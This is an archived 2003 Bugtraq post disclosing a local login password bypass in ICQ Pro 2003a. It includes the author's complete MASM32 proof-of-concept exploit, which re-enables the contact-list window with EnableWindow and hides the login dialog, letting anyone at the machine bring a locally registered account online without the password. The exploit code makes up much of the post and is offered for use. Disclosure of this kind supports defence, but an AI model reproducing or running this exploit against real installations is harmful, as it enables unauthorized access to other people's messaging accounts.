ICQ 2003a Password Bypass

From: Cauу (mouraprado_at_infoguerra.com.br)
Date: 07/05/03

  • Next message: Gadgeteer: "Re: Email marketing company gives out questionable security advice"
    Date: 5 Jul 2003 13:30:23 -0000
    To: bugtraq@securityfocus.com
    
    
    ('binary' encoding is not supported, stored as-is)

    Software: ICQ 2003a
    Threat: Login password can be bypassed locally

    I have found a vulnerability in ICQ Pro 2003a that
    allows anyone to connect to ICQ server using any
    account registered locally regardless the 'save
    password' option is checked or not. High level
    security password is also bypassed!

    How it works?
    Simple! You may use EnableWindow API to enable ICQ
    contact list window. After enabling the window you can
    set your status to online and the UIN will be
    connected no matter how high is your security level.

    I've coded a proof-of-concept exploit in July, 02 when
    I found the vuln.
    The exploit is provided "As is" without warranties.
    To compile it you will need MASM32.

    ; ллллллллллллллллллллллллллллллллллллллллллллллллллллл
    лллллллллллллллллллл
    ; CUT HERE - CUTE HERE - ca1-icq.asm - CUT
    HERE - CUT HERE BOF
    ; -----------------------------------------------------
    --------------------
    ;
    ; 07/02/2003 - ca1-icq.asm
    ; ICQ Password Bypass exploit.
    ; written by Cauу Moura Prado (aka ca1)
    ; mouraprado@infoguerra.com.br - ICQ 373313
    ;
    ; This exploit allows you to login to ICQ server
    using any account registered *locally*
    ; no matter the 'save password' option is checked or
    not. High level security is also bypassed.
    ; All you have to do is run the exploit and set
    status property using your mouse when the flower
    ; is yellow. If you accidentally set status to
    offline then you will need to restart ICQ and run
    ; the exploit again. Greets to: Alex Demchenko(aka
    Coban), my cousin Rhenan for testing the exploit
    ; on his machine and that tiny Israeli company for
    starting the whole thing. Oh sure.. hehehe
    ; I can't forget... many kisses to those 3 chicks
    from my building for being so hot!! ;)
    ;
    ;
    ; uh-oh!
    ; ___
    ; __/ \__
    ; / \___/ \ Vulnerable:
    ; \__/+ +\__/ ICQ Pro 2003a Build #3800
    ; / ~~~ \
    ; \__/ \__/ Not Vulnerable:
    ; \___/ ICQ Lite alpha Build 1211
    ; ICQ 2001b and ICQ 2002a
    ; tHe Flaw Power All other versions were not
    tested.
    ;
                               coded with masm32
    ;
    _______________________________________________________
    ________________________exploit born in .br
            
    .386
    .model flat, stdcall
    option casemap:none
    include \masm32\include\user32.inc
    include \masm32\include\kernel32.inc
    includelib \masm32\lib\user32.lib
    includelib \masm32\lib\kernel32.lib
    .data
    szTextHigh byte 'Password Verification', 0
    szTextLow byte 'Login to server', 0
    szClassName byte '#32770', 0
    .data?
    hWndLogin dword ?
    .code
    _entrypoint:
     invoke FindWindow, addr szClassName, addr szTextHigh
     mov hWndLogin, eax
     .if hWndLogin == 0
       invoke FindWindow, addr szClassName, addr szTextLow
       mov hWndLogin, eax
     .endif
     invoke GetParent, hWndLogin
     invoke EnableWindow, eax, 1 ;Enable ICQ contact
    list
     invoke ShowWindow, hWndLogin, 0 ;get rid of Login
    screen (don't kill this window)
     invoke ExitProcess, 0 ;uhuu.. cya! i gotta
    sleep!
    end _entrypoint

    ; ллллллллллллллллллллллллллллллллллллллллллллллллллллл
    лллллллллллллллллллл
    ; CUT HERE - CUTE HERE - ca1-icq.asm - CUT
    HERE - CUT HERE EOF
    ; -----------------------------------------------------
    --------------------


  • Next message: Gadgeteer: "Re: Email marketing company gives out questionable security advice"

    Relevant Pages

    • Re: [SLE] Kopete and ICQ
      ... Dalton ... > I can not login to ICQ with Kopete any more..... ...
      (SuSE)
    • Re: Dialog doesnt play well with Gmails smtp server
      ... using Automatic as the login. ... PGP key ID - DSS:0x2661A952 ... Homepage: http://www.colinjones.co.uk ICQ# 1707811 ... Skittles Team: http://www.ddskittles.co.uk ...
      (news.software.readers)
    • Re: changing login
      ... I misstyped the login name, how do I change it to the correct ... spelling. ... See "How to Use the AutoComplete Feature in Internet Explorer 5 and 6" ... ICQ: 192649233 ...
      (microsoft.public.windowsxp.newusers)
    • Re: ICQ 2003a Password Bypass
      ... CMP> Threat: Login password can be bypassed locally ... I maybe missed smth but does it mean ICQ 2003a and other mentioned ... This exploit allows you to login to ICQ server ... CMP> hWndLogin dword? ...
      (Bugtraq)